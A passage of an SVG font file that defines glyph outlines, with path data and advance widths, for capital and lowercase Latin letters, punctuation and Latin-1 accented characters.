<glyph unicode="I" horiz-adv-x="589" d="M173 0v1456h243v-1456h-243z" />
<glyph unicode="J" horiz-adv-x="1148" d="M64 407l2 6h235q0 -124 61.5 -182t171.5 -58q96 0 158.5 67t62.5 181v1035h243v-1035q0 -204 -130 -323t-334 -119q-219 0 -347 109q-123 105 -123 303v16z" />
<glyph unicode="K" horiz-adv-x="1320" d="M159 0v1456h243v-617h139l457 617h288l-530 -695l571 -761h-297l-460 630h-168v-630h-243z" />
<glyph unicode="L" horiz-adv-x="1108" d="M159 0v1456h243v-1262h669v-194h-912z" />
<glyph unicode="M" horiz-adv-x="1794" d="M159 0v1456h315l419 -1120h6l420 1120h315v-1456h-243v496l24 631l-6 1l-432 -1128h-163l-430 1125l-6 -1l24 -628v-496h-243z" />
<glyph unicode="N" horiz-adv-x="1456" d="M159 0v1456h243l646 -1062l6 2v1060h242v-1456h-242l-646 1063l-6 -2v-1061h-243z" />
<glyph unicode="O" horiz-adv-x="1398" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-262 0 -425.5 175.5t-163.5 442.5zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264q0 182 -97.5 299t-263.5 117q-160 0 -253 -117 t-93 -299v-264z" />
<glyph unicode="P" horiz-adv-x="1323" d="M159 0v1456h569q241 0 377.5 -124.5t136.5 -327.5q0 -205 -136.5 -328.5t-377.5 -123.5h-326v-552h-243zM402 747h326q135 0 203 72t68 183t-68 185t-203 74h-326v-514z" />
<glyph unicode="Q" horiz-adv-x="1414" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -135 -46 -251t-130 -200l242 -235l-162 -145l-268 256q-54 -22 -114 -32.5t-124 -10.5q-262 0 -425.5 175.5t-163.5 442.5zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264 q0 182 -97.5 299t-263.5 117q-160 0 -253 -117t-93 -299v-264z" />
<glyph unicode="R" horiz-adv-x="1356" d="M159 0v1456h538q244 0 377 -110t133 -314q0 -113 -58.5 -194.5t-170.5 -130.5q123 -39 177 -127.5t54 -217.5v-121q0 -64 16 -125t54 -93v-23h-250q-40 33 -51.5 104t-11.5 139v117q0 112 -64 178t-176 66h-324v-604h-243zM402 799h282q146 0 213 56t67 171 q0 110 -66 172.5t-201 62.5h-295v-462z" />
<glyph unicode="S" horiz-adv-x="1288" d="M96 430l2 6h234q0 -133 92 -198.5t239 -65.5q135 0 210 54.5t75 147.5q0 91 -67.5 149t-238.5 104q-244 64 -375.5 169.5t-131.5 276.5q0 176 145.5 290t375.5 114q240 0 386 -129q141 -125 140 -298v-12l-2 -6h-233q0 112 -76 181.5t-217 69.5q-133 0 -204.5 -58 t-71.5 -150q0 -83 77.5 -138t256.5 -104q235 -63 357 -174t122 -283q0 -182 -145.5 -289.5t-382.5 -107.5q-228 1 -400 121q-167 117 -167 318v12z" />
<glyph unicode="T" horiz-adv-x="1185" d="M31 1261v195h1123v-195h-440v-1261h-243v1261h-440z" />
<glyph unicode="U" horiz-adv-x="1396" d="M134 480v976h243v-976q0 -153 86 -230t231 -77q150 0 239 77t89 230v976h243v-976q0 -242 -158 -371.5t-413 -129.5q-250 0 -405 130t-155 371z" />
<glyph unicode="V" horiz-adv-x="1300" d="M15 1456h259l347 -1075l26 -101h6l25 99l348 1077h259l-520 -1456h-231z" />
<glyph unicode="W" horiz-adv-x="1812" d="M40 1456h239l233 -1068v-2l1 5l291 1065h194l294 -1068l1 -7l1 10l230 1065h239l-346 -1456h-221l-291 1045h-6l-292 -1045h-222z" />
<glyph unicode="X" horiz-adv-x="1300" d="M50 0l458 734l-448 722h286l304 -538l307 538h288l-448 -722l465 -734h-292l-316 547l-316 -547h-288z" />
<glyph unicode="Y" horiz-adv-x="1270" d="M13 1456h271l350 -708l352 708h271l-505 -945v-511h-242v524z" />
<glyph unicode="Z" horiz-adv-x="1216" d="M88 0v152l731 1109h-725v195h1018v-146l-735 -1116h760v-194h-1049z" />
<glyph unicode="[" horiz-adv-x="561" d="M132 -324v2002h408v-190h-165v-1623h165v-189h-408z" />
<glyph unicode="\" horiz-adv-x="855" d="M21 1456h236l608 -1581h-236z" />
<glyph unicode="]" horiz-adv-x="561" d="M12 -135h167v1623h-167v190h410v-2002h-410v189z" />
<glyph unicode="^" horiz-adv-x="875" d="M53 729l299 727h171l298 -727h-205l-165 413l-12 54h-6l-12 -54l-162 -413h-206z" />
<glyph unicode="_" horiz-adv-x="924" d="M3 0h917v-191h-917v191z" />
<glyph unicode="`" horiz-adv-x="660" d="M80 1472l2 6h268l185 -266h-196z" />
<glyph unicode="a" horiz-adv-x="1114" d="M82 305q0 157 124 244.5t349 87.5h189v95q0 85 -50 133t-143 48q-83 0 -132 -40t-49 -103h-234l-1 6v14q1 120 115 213q122 99 316 99q189 0 305 -96t116 -276v-481q0 -67 9 -128.5t29 -120.5h-246q-13 41 -21.5 80t-11.5 78q-50 -76 -131.5 -127.5t-182.5 -51.5 q-169 0 -259.5 87t-90.5 239zM325 309q0 -62 40.5 -98.5t115.5 -36.5q92 0 165.5 46t97.5 105v160h-193q-106 0 -166 -52.5t-60 -123.5z" />
<glyph unicode="b" d="M128 0v1560h243v-601q50 69 120 106t163 37q203 0 313.5 -158t110.5 -418v-21q0 -237 -110.5 -381.5t-311.5 -144.5q-101 0 -175.5 41t-124.5 120l-24 -140h-204zM371 313q31 -65 86 -100.5t138 -35.5q126 0 183 88.5t57 239.5v21q0 169 -58 273t-184 104 q-81 0 -135.5 -36t-86.5 -100v-454z" />
<glyph unicode="c" horiz-adv-x="1075" d="M81 523v35q0 235 127.5 389.5t366.5 154.5q195 0 317 -114q118 -110 117 -277v-11l-2 -6h-221q0 89 -58.5 151t-152.5 62q-137 0 -194 -99.5t-57 -249.5v-35q0 -153 57 -251.5t194 -98.5q89 0 150 52.5t61 131.5h220l2 -6v-11q0 -145 -124 -251q-128 -110 -309 -110 q-239 0 -366.5 154t-127.5 390z" />
<glyph unicode="d" d="M83 505v21q0 259 111 417.5t312 158.5q88 0 157.5 -35.5t120.5 -101.5v595h243v-1560h-204l-24 134q-52 -76 -125 -115.5t-170 -39.5q-199 0 -310 145t-111 381zM326 505q0 -150 57.5 -239t182.5 -89q77 0 130.5 33t87.5 94v472q-34 60 -88 93.5t-128 33.5 q-124 0 -183 -104.5t-59 -272.5v-21z" />
<glyph unicode="e" horiz-adv-x="1084" d="M89 516v40q-1 236 135 392q135 155 337 154h3q219 0 335.5 -132.5t116.5 -355.5v-143h-675l-2 -5q6 -129 75.5 -211t192.5 -82q98 0 168 24t135 69l78 -159q-61 -54 -162 -91t-234 -37q-230 0 -366.5 150.5t-136.5 386.5zM344 654l2 -5h429v25q0 103 -52.5 168t-158.5 65 q-90 0 -148 -71.5t-72 -181.5z" />
<glyph unicode="f" horiz-adv-x="719" d="M42 902v180h165v126q0 179 97.5 276t273.5 97q35 0 71 -5.5t81 -15.5l-25 -188q-20 4 -44.5 7t-52.5 3q-79 0 -118.5 -45t-39.5 -129v-126h220v-180h-220v-902h-243v902h-165z" />
<glyph unicode="g" d="M84 505v21q0 258 113 417t314 159q97 0 170.5 -41.5t124.5 -119.5l24 141h202v-1082q0 -209 -129 -323t-366 -114q-79 0 -170.5 22.5t-165.5 59.5l52 191q60 -31 132.5 -48.5t149.5 -17.5q132 0 193 56.5t61 173.5v111q-51 -65 -120.5 -98.5t-159.5 -33.5 q-199 0 -312 145t-113 381zM327 505q0 -149 59.5 -238.5t184.5 -89.5q78 0 131.5 32.5t86.5 93.5v474q-34 59 -87.5 92.5t-128.5 33.5q-125 0 -185.5 -105t-60.5 -272v-21z" />
<glyph unicode="h" d="M125 0v1560h243v-618q54 76 131.5 118t171.5 42q172 0 268.5 -108.5t96.5 -334.5v-659h-243v661q0 128 -51 185t-153 57q-71 0 -127.5 -29.5t-93.5 -81.5v-792h-243z" />
<glyph unicode="i" horiz-adv-x="531" d="M144 0v1082h243v-1082h-243zM144 1347v213h243v-213h-243z" />
<glyph unicode="j" horiz-adv-x="537" d="M-80 -420l14 194q17 -5 42 -8.5t46 -3.5q62 0 97.5 42.5t35.5 132.5v1145h243v-1145q0 -179 -93 -276.5t-259 -97.5q-36 0 -65 4t-61 13zM149 1347v213h243v-213h-243z" />
<glyph unicode="k" horiz-adv-x="1072" d="M129 0v1560h242v-892h101l273 414h286l-357 -492l410 -590h-282l-322 473h-109v-473h-242z" />
<glyph unicode="l" horiz-adv-x="531" d="M144 0v1560h243v-1560h-243z" />
<glyph unicode="m" horiz-adv-x="1781" d="M128 0v1082h222l13 -141q53 77 133 119t185 42q106 0 182 -48t114 -144q50 90 132 141t192 51q163 0 257.5 -111.5t94.5 -338.5v-652h-243v653q0 138 -47.5 194t-142.5 56q-78 0 -132 -42t-78 -113q0 -15 1 -26t1 -21v-701h-243v653q0 133 -48.5 191.5t-142.5 58.5 q-74 0 -125.5 -28.5t-81.5 -80.5v-794h-243z" />
<glyph unicode="n" d="M126 0v1082h222l14 -156q53 83 133.5 129.5t181.5 46.5q169 0 263.5 -102.5t94.5 -319.5v-680h-243v678q0 122 -50.5 173.5t-153.5 51.5q-71 0 -127 -31.5t-92 -86.5v-785h-243z" />
<glyph unicode="o" d="M83 530v21q0 241 132 396q134 155 363 155q233 0 365 -155q133 -154 133 -396v-21q0 -244 -133 -398q-132 -153 -363 -153q-232 0 -365 154q-132 154 -132 397zM326 530q0 -158 62 -258q61 -99 192 -99q127 0 190 99q64 100 64 258v21q0 155 -64 255q-63 101 -192 101 q-127 0 -190 -101q-62 -101 -62 -255v-21z" />
<glyph unicode="p" d="M128 -416v1498h205l24 -136q52 76 125.5 116t170.5 40q200 0 311.5 -158.5t111.5 -417.5v-21q0 -236 -111 -381t-309 -145q-92 0 -163 33t-122 97v-525h-243zM371 291q32 -57 85 -87.5t131 -30.5q124 0 185.5 91.5t61.5 240.5v21q0 166 -62.5 271.5t-186.5 105.5 q-76 0 -129 -32.5t-85 -90.5v-489z" />
<glyph unicode="q" d="M83 505v21q0 259 111 417.5t312 158.5q94 0 166 -39t123 -112l28 131h197v-1498h-243v518q-50 -61 -118 -92t-155 -31q-199 0 -310 145t-111 381zM326 505q0 -150 57.5 -241t182.5 -91q74 0 125.5 29.5t85.5 85.5v504q-34 54 -86 84.5t-123 30.5q-124 0 -183 -106.5 t-59 -274.5v-21z" />
<glyph unicode="r" horiz-adv-x="709" d="M128 0v1082h222l16 -157q41 83 105.5 130t148.5 47q22 0 41 -3.5t35 -8.5l-29 -227l-104 4q-71 0 -118.5 -30t-73.5 -85v-752h-243z" />
<glyph unicode="s" horiz-adv-x="1065" d="M88 335l2 6h226q4 -94 68 -137t156 -43q94 0 145 36t51 97q0 56 -48 93t-179 65q-194 41 -293.5 116.5t-99.5 205.5q0 136 115 232t303 96q198 0 314 -98q112 -93 112 -229v-12l-2 -6h-233q0 67 -51 115t-140 48q-88 0 -134 -39.5t-46 -96.5t43.5 -90.5t176.5 -59.5 q204 -42 302.5 -118.5t98.5 -208.5q0 -146 -120.5 -237t-317.5 -91q-211 0 -333 108q-116 103 -116 235v13z" />
<glyph unicode="t" horiz-adv-x="712" d="M23 902v180h165v263h242v-263h194v-180h-194v-598q0 -67 29 -95.5t77 -28.5q20 0 39 3.5t36 9.5l26 -178q-31 -17 -74 -26.5t-89 -9.5q-134 0 -210 78.5t-76 246.5v598h-165z" />
<glyph unicode="u" d="M123 435v647h242v-649q0 -142 46 -199t139 -57q88 0 147.5 31.5t93.5 91.5v782h243v-1082h-212l-20 158q-51 -86 -129 -132.5t-180 -46.5q-174 0 -272 111t-98 345z" />
<glyph unicode="v" horiz-adv-x="1038" d="M32 1082h251l221 -716l18 -88h6l19 88l215 716h251l-384 -1082h-211z" />
<glyph unicode="w" horiz-adv-x="1530" d="M37 1082h233l173 -758l6 -1l225 759h177l229 -770l6 1l169 769h233l-296 -1082h-199l-230 739l-2 10l-1 -10l-228 -739h-199z" />
<glyph unicode="x" horiz-adv-x="1038" d="M33 0l350 547l-340 535h276l197 -371l200 371h279l-340 -535l350 -547h-276l-209 380l-209 -380h-278z" />
<glyph unicode="y" horiz-adv-x="1038" d="M16 1082h265l206 -648l24 -108h6l237 756h266l-448 -1246q-43 -113 -121 -193t-221 -80q-30 0 -64.5 6t-66.5 14l27 188q13 -1 37 -3t36 -2q66 0 105.5 45t64.5 104l40 98z" />
<glyph unicode="z" horiz-adv-x="1038" d="M85 0v159l546 727h-535v196h842v-154l-552 -734h578v-194h-879z" />
<glyph unicode="{" horiz-adv-x="687" d="M56 529v178q98 0 145.5 58t47.5 164v203q0 171 82.5 290.5t277.5 174.5l48 -140q-98 -33 -138.5 -117t-40.5 -208v-203q0 -104 -43 -184.5t-130 -125.5q87 -47 130 -127.5t43 -182.5v-203q0 -124 40.5 -208t138.5 -117l-48 -141q-195 55 -277.5 175t-82.5 291v203 q0 104 -47.5 162t-145.5 58z" />
<glyph unicode="|" horiz-adv-x="514" d="M174 -270v1726h167v-1726h-167z" />
<glyph unicode="}" horiz-adv-x="687" d="M27 -219q97 33 138.5 117t41.5 208v203q0 105 44.5 185t137.5 124q-93 43 -137.5 123.5t-44.5 187.5v203q0 124 -41.5 208t-138.5 117l48 140q194 -55 277 -174.5t83 -290.5v-203q0 -106 47 -164t147 -58v-178q-100 0 -147 -58t-47 -162v-203q0 -171 -83 -291t-277 -175z " />
<glyph unicode="~" horiz-adv-x="1361" d="M117 460q0 150 86 252.5t221 102.5q86 0 161.5 -33.5t155.5 -101.5q54 -48 97 -69t90 -21q59 0 102 54.5t43 128.5l171 -23q0 -151 -88 -257t-221 -106q-87 0 -159.5 32.5t-155.5 103.5q-55 46 -99 68t-90 22q-60 0 -102 -51.5t-42 -123.5z" />
<glyph unicode="&#xa1;" horiz-adv-x="542" d="M143 -374v964h243v-964h-243zM143 847v235h243v-235h-243z" />
<glyph unicode="&#xa2;" horiz-adv-x="1149" d="M91 523v35q0 208 101.5 356t294.5 180v224h200v-225q154 -29 245 -136.5t88 -257.5l-2 -5h-222q0 89 -58.5 151t-152.5 62q-137 0 -194 -99.5t-57 -249.5v-35q0 -153 57 -251.5t194 -98.5q89 0 150 52.5t61 131.5h222l2 -5q3 -129 -92.5 -231t-240.5 -131v-235h-200v232 q-193 31 -294.5 178.5t-101.5 357.5z" />
<glyph unicode="&#xa3;" horiz-adv-x="1205" d="M81 600v195h155l-9 238q0 207 116 325.5t311 118.5q207 0 321 -108.5t110 -286.5l-2 -6h-235q0 105 -54.5 155.5t-139.5 50.5q-86 0 -135 -65.5t-49 -183.5l9 -238h389v-195h-381l5 -114q0 -82 -22.5 -158t-64.5 -134h725v-194h-986v194h10q47 13 70.5 101.5t23.5 182.5 l-5 122h-162z" />
<glyph unicode="&#xa4;" horiz-adv-x="1437" d="M93 118l135 137q-49 76 -74.5 165.5t-25.5 187.5q0 101 28 193.5t81 171.5l-144 147l141 144l142 -145q74 55 162 85t185 30q96 0 185 -30.5t164 -86.5l145 148l142 -145l-148 -151q51 -78 79 -169.5t28 -191.5q0 -97 -25.5 -185.5t-72.5 -163.5l139 -141l-142 -145 l-132 134q-77 -61 -169.5 -94t-192.5 -33q-101 0 -193 32.5t-167 93.5l-129 -132zM313 608q0 -185 119.5 -314t290.5 -129q170 0 289.5 129t119.5 314q0 184 -119.5 312t-289.5 128q-171 0 -290.5 -128t-119.5 -312z" />
<glyph unicode="&#xa5;" horiz-adv-x="1248" d="M26 1456h272l322 -640l323 640h271l-397 -714h276v-195h-355v-115h355v-195h-355v-237h-243v237h-357v195h357v115h-357v195h287z" />
<glyph unicode="&#xa6;" horiz-adv-x="508" d="M136 -270v795h229v-795h-229zM136 698v758h229v-758h-229z" />
<glyph unicode="&#xa7;" horiz-adv-x="1272" d="M94 542q0 90 43.5 160t125.5 114q-67 50 -100 119.5t-33 166.5q0 169 137.5 272t367.5 103q238 0 372 -111.5t129 -312.5l-2 -6h-234q0 101 -70 168t-195 67q-130 0 -196 -50.5t-66 -127.5q0 -86 61 -129t257 -95q244 -66 358.5 -158.5t114.5 -266.5q0 -93 -44.5 -162 t-126.5 -111q67 -50 101 -119t34 -166q0 -175 -136.5 -274t-367.5 -99q-226 0 -379 101t-148 319l2 6l233 1q0 -122 85 -177t207 -55t192 49.5t70 126.5t-67 122t-254 101q-242 64 -356.5 157t-114.5 267zM336 558q0 -89 62 -134.5t256 -100.5q53 -16 88 -26.5t67 -21.5 q55 22 85 64.5t30 99.5q0 80 -68 128.5t-255 105.5q-42 10 -81 22.5t-76 26.5q-55 -21 -81.5 -63.5t-26.5 -100.5z" />
<glyph unicode="&#xa8;" horiz-adv-x="1054" d="M164 1252v204h241v-204h-241zM647 1252v204h242v-204h-242z" />
<glyph unicode="&#xa9;" horiz-adv-x="1604" d="M87 729q0 315 207 531t503 216q295 0 502 -216t207 -531q0 -316 -207.5 -533t-501.5 -217q-296 0 -503 217t-207 533zM209 729q0 -264 171.5 -444.5t416.5 -180.5q244 0 415.5 180.5t171.5 444.5q0 263 -171.5 442.5t-415.5 179.5q-246 0 -417 -179.5t-171 -442.5z M434 669v119q0 173 94.5 280t254.5 107q157 0 245.5 -79.5t84.5 -228.5l-2 -6h-148q0 94 -45 136.5t-135 42.5q-94 0 -144.5 -69t-50.5 -182v-120q0 -115 50.5 -183.5t144.5 -68.5q90 0 134.5 41.5t44.5 137.5h148l2 -6q4 -151 -84 -229.5t-245 -78.5q-160 0 -254.5 106 t-94.5 281z" />
<glyph unicode="&#xaa;" horiz-adv-x="913" d="M116 920q0 111 84.5 171t246.5 60h137v51q0 62 -29.5 94.5t-86.5 32.5q-66 0 -102 -26t-36 -73l-165 13l-1 6q-6 98 79 163t225 65q134 0 212.5 -71t78.5 -205v-314q0 -51 6 -95t20 -86h-177q-8 21 -13 44.5t-8 49.5q-33 -47 -88.5 -77.5t-133.5 -30.5q-119 0 -184 61 t-65 167zM291 924q0 -43 29 -65.5t88 -22.5q51 0 104.5 29t71.5 64v105h-136q-74 0 -115.5 -32t-41.5 -78z" />
<glyph unicode="&#xab;" horiz-adv-x="994" d="M98 507v19l288 390h167l-247 -400l247 -399h-167zM432 507v19l288 390h167l-247 -400l247 -399h-167z" />
<glyph unicode="&#xac;" horiz-adv-x="1133" d="M127 634v171h835v-431h-200v260h-635z" />
<glyph unicode="&#xad;" horiz-adv-x="672" d="M71 521v196h525v-196h-525z" />
<glyph unicode="&#xae;" horiz-adv-x="1604" d="M87 729q0 315 207 531t503 216q295 0 502 -216t207 -531q0 -316 -207.5 -533t-501.5 -217q-296 0 -503 217t-207 533zM209 729q0 -264 171.5 -444.5t416.5 -180.5q244 0 415.5 180.5t171.5 444.5q0 263 -171.5 442.5t-415.5 179.5q-246 0 -417 -179.5t-171 -442.5z M502 316v850h281q151 0 238 -66.5t87 -193.5q0 -59 -30.5 -104t-89.5 -76q62 -28 89.5 -82t27.5 -129v-56q0 -41 3.5 -73.5t13.5 -53.5v-16h-155q-9 21 -11 61.5t-2 82.5v54q0 71 -33.5 105t-109.5 34h-158v-337h-151zM653 787h143q68 0 115 30.5t47 85.5q0 72 -39 101 t-136 29h-130v-246z" />
<glyph unicode="&#xaf;" horiz-adv-x="987" d="M135 1298v158h727v-158h-727z" />
<glyph unicode="&#xb0;" horiz-adv-x="778" d="M127 1208q0 110 77.5 189.5t186.5 79.5q107 0 183.5 -79.5t76.5 -189.5t-76.5 -187t-183.5 -77q-109 0 -186.5 77t-77.5 187zM266 1208q0 -53 36.5 -88.5t88.5 -35.5q51 0 86.5 35t35.5 89t-35.5 91t-86.5 37q-52 0 -88.5 -37t-36.5 -91z" />
<glyph unicode="&#xb1;" horiz-adv-x="1099" d="M95 707v199h358v384h215v-384h343v-199h-343v-395h-215v395h-358zM126 -23v196h835v-196h-835z" />
<glyph unicode="&#xb2;" horiz-adv-x="865" d="M114 1231q-6 103 80 175.5t231 72.5q139 0 216.5 -65t77.5 -182q0 -81 -48.5 -140t-168.5 -164l-129 -110l2 -6h350v-145h-607v145l305 256q64 54 84 89t20 76q0 44 -25.5 72t-79.5 28q-61 0 -93 -30t-32 -78h-181z" />
<glyph unicode="&#xb3;" horiz-adv-x="867" d="M104 888l2 6h181q0 -43 34.5 -68.5t95.5 -25.5q64 0 102 26t38 71q0 56 -35.5 83.5t-104.5 27.5h-123v131h123q65 0 95.5 26.5t30.5 74.5q0 39 -32.5 65.5t-94.5 26.5q-53 0 -84.5 -22t-31.5 -56h-181l-2 6q-6 98 80 158t216 60q149 0 235 -59.5t86 -169.5 q0 -55 -35.5 -100.5t-96.5 -70.5q70 -24 107.5 -71.5t37.5 -115.5q0 -112 -90 -174t-239 -62q-135 0 -227.5 60.5t-86.5 172.5z" />
<glyph unicode="&#xb4;" horiz-adv-x="689" d="M120 1212l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xb5;" horiz-adv-x="1211" d="M146 -416v1498h242v-620q0 -167 50 -227t147 -60q87 0 142.5 30.5t84.5 90.5v786h243v-1082h-223l-7 86q-45 -53 -104.5 -80t-134.5 -27q-61 0 -110.5 13.5t-87.5 41.5v-450h-242z" />
<glyph unicode="&#xb6;" horiz-adv-x="1040" d="M62 988q0 207 129.5 337.5t362.5 130.5h326v-1456h-243v520h-83q-233 0 -362.5 129.5t-129.5 338.5z" />
<glyph unicode="&#xb7;" horiz-adv-x="578" d="M160 594v240h242v-240h-242z" />
<glyph unicode="&#xb8;" horiz-adv-x="528" d="M109 -136l32 139h177l-11 -54q64 -11 107 -52t43 -121q0 -102 -85 -162.5t-242 -60.5l-7 137q62 0 99.5 22t37.5 67q0 44 -34.5 62t-116.5 23z" />
<glyph unicode="&#xb9;" horiz-adv-x="565" d="M87 1304v150l319 23v-812h-192v639h-127z" />
<glyph unicode="&#xba;" horiz-adv-x="935" d="M119 1026v116q0 148 94 241.5t252 93.5t252.5 -93.5t94.5 -241.5v-116q0 -149 -94 -241.5t-251 -92.5q-159 0 -253.5 92.5t-94.5 241.5zM294 1026q0 -85 44 -136.5t129 -51.5q82 0 126 51.5t44 136.5v116q0 83 -44.5 135t-127.5 52q-84 0 -127.5 -52t-43.5 -135v-116z " />
<glyph unicode="&#xbb;" horiz-adv-x="994" d="M106 151l247 399l-247 400h167l288 -390v-19l-288 -390h-167zM452 151l247 399l-247 400h167l288 -390v-19l-288 -390h-167z" />
<glyph unicode="&#xbc;" horiz-adv-x="1548" d="M176 1303v150l319 23v-812h-192v639h-127zM325 189l711 1138l125 -72l-711 -1138zM775 261l422 540h192v-511h114v-145h-114v-145h-191v145h-413zM977 295l3 -5h218v277l-6 2l-12 -20z" />
<glyph unicode="&#xbd;" horiz-adv-x="1638" d="M176 1303v150l319 23v-812h-192v639h-127zM338 189l711 1138l125 -72l-711 -1138zM925 564q-6 103 80 175.5t231 72.5q139 0 216.5 -65t77.5 -182q0 -81 -48.5 -140t-168.5 -164l-129 -110l2 -6h350v-145h-607v145l305 256q64 54 84 89t20 76q0 44 -25.5 72t-79.5 28 q-61 0 -93 -30t-32 -78h-181z" />
<glyph unicode="&#xbe;" horiz-adv-x="1753" d="M120 889l2 6h181q0 -43 34.5 -68.5t95.5 -25.5q64 0 102 26t38 71q0 56 -35.5 83.5t-104.5 27.5h-123v131h123q65 0 95.5 26.5t30.5 74.5q0 39 -32.5 65.5t-94.5 26.5q-53 0 -84.5 -22t-31.5 -56h-181l-2 6q-6 98 80 158t216 60q149 0 235 -59.5t86 -169.5 q0 -55 -35.5 -100.5t-96.5 -70.5q70 -24 107.5 -71.5t37.5 -115.5q0 -112 -90 -174t-239 -62q-135 0 -227.5 60.5t-86.5 172.5zM508 189l711 1138l125 -72l-711 -1138zM964 261l422 540h192v-511h114v-145h-114v-145h-191v145h-413zM1166 295l3 -5h218v277l-6 2l-12 -20z " />
<glyph unicode="&#xbf;" horiz-adv-x="1025" d="M96 8q0 127 73 235.5t186 198.5q56 49 71.5 94.5t15.5 132.5h242q-2 -144 -33.5 -205t-141.5 -153q-80 -79 -125 -147.5t-45 -151.5q0 -97 52 -150.5t151 -53.5q81 0 139 46t60 135h234l3 -6q1 -178 -121.5 -277.5t-314.5 -99.5q-211 0 -328.5 107t-117.5 295zM438 849 v233h248v-233h-248z" />
<glyph unicode="&#xc0;" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM346 1820l2 6h268l185 -266h-196zM448 543h431l-211 622h-6z" />
<glyph unicode="&#xc1;" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM448 543h431l-211 622h-6zM569 1559l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xc2;" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM324 1597v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193zM448 543h431l-211 622h-6z" />
<glyph unicode="&#xc3;" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM300 1637q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78l131 -39q0 -95 -60 -162t-150 -67q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5zM448 543h431 l-211 622h-6z" />
<glyph unicode="&#xc4;" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM298 1601v204h241v-204h-241zM448 543h431l-211 622h-6zM781 1601v204h242v-204h-242z" />
<glyph unicode="&#xc5;" horiz-adv-x="1320" d="M16 0l535 1456h230l529 -1456h-247l-115 340h-570l-116 -340h-246zM448 543h431l-211 622h-6zM450 1737q0 84 61.5 141t150.5 57q87 0 147.5 -57t60.5 -141q0 -85 -60.5 -139.5t-147.5 -54.5q-89 0 -150.5 54.5t-61.5 139.5zM560 1737q0 -43 29.5 -72t72.5 -29 q42 0 70 28t28 73t-28 74.5t-70 30.5q-43 -1 -72.5 -30.5t-29.5 -74.5z" />
<glyph unicode="&#xc6;" horiz-adv-x="1925" d="M-10 0l835 1456h992v-197h-646l17 -408h548v-197h-540l20 -458h663v-196h-898l-15 340h-502l-184 -340h-290zM580 555h377l-27 637l-5 1z" />
<glyph unicode="&#xc7;" horiz-adv-x="1302" d="M106 589v277q0 266 157.5 438.5t409.5 172.5q258 0 406.5 -135.5t144.5 -364.5l-2 -6h-235q0 147 -79.5 229t-234.5 82q-149 0 -236.5 -118t-87.5 -296v-279q0 -180 89.5 -298t241.5 -118q151 0 229 81t78 229h234l2 -6q4 -221 -143.5 -359.5t-399.5 -138.5 q-255 0 -414.5 171.5t-159.5 438.5zM554 -140l32 139h177l-11 -54q64 -11 107 -52t43 -121q0 -102 -85 -162.5t-242 -60.5l-7 137q62 0 99.5 22t37.5 67q0 44 -34.5 62t-116.5 23z" />
<glyph unicode="&#xc8;" horiz-adv-x="1187" d="M159 0v1456h975v-195h-732v-411h637v-195h-637v-461h739v-194h-982zM276 1820l2 6h268l185 -266h-196z" />
<glyph unicode="&#xc9;" horiz-adv-x="1187" d="M159 0v1456h975v-195h-732v-411h637v-195h-637v-461h739v-194h-982zM499 1559l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xca;" horiz-adv-x="1187" d="M159 0v1456h975v-195h-732v-411h637v-195h-637v-461h739v-194h-982zM282 1597v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193z" />
<glyph unicode="&#xcb;" horiz-adv-x="1187" d="M159 0v1456h975v-195h-732v-411h637v-195h-637v-461h739v-194h-982zM255 1601v204h241v-204h-241zM738 1601v204h242v-204h-242z" />
<glyph unicode="&#xcc;" horiz-adv-x="589" d="M-45 1820l2 6h268l185 -266h-196zM173 0v1456h243v-1456h-243z" />
<glyph unicode="&#xcd;" horiz-adv-x="589" d="M173 0v1456h243v-1456h-243zM176 1559l191 266h269l2 -6l-273 -260h-189z" />
<glyph unicode="&#xce;" horiz-adv-x="589" d="M-39 1597v26l264 240h143l266 -242v-24h-195l-143 139l-142 -139h-193zM173 0v1456h243v-1456h-243z" />
<glyph unicode="&#xcf;" horiz-adv-x="589" d="M-66 1601v204h241v-204h-241zM173 0v1456h243v-1456h-243zM417 1601v204h242v-204h-242z" />
<glyph unicode="&#xd0;" horiz-adv-x="1376" d="M36 657v170h153v629h472q277 0 450.5 -173t173.5 -445v-221q0 -273 -173.5 -445t-450.5 -172h-472v657h-153zM432 194h222q181 0 284.5 118t103.5 305v223q0 185 -103.5 303t-284.5 118h-222v-434h259v-170h-259v-463z" />
<glyph unicode="&#xd1;" horiz-adv-x="1456" d="M159 0v1456h243l646 -1062l6 2v1060h242v-1456h-242l-646 1063l-6 -2v-1061h-243zM366 1637q0 94 59.5 163.5t149.5 69.5q56 0 145.5 -44.5t141.5 -44.5q38 0 66 32t28 78l131 -39q0 -95 -60 -162t-150 -67q-71 0 -153.5 44.5t-133.5 44.5q-39 0 -66 -32.5t-27 -77.5z " />
<glyph unicode="&#xd2;" horiz-adv-x="1398" d="M103 597v262q0 266 163.5 442t424.5 176q267 0 435 -176t168 -442v-262q0 -267 -167.5 -442.5t-434.5 -175.5q-262 0 -425.5 175.5t-163.5 442.5zM345 597q0 -184 93 -301.5t254 -117.5q167 0 263.5 117t96.5 302v264q0 182 -97.5 299t-263.5 117q-160 0 -253 -117 t-93 -299v-264zM358 1841l2 6h268l185 -266h-196z" />
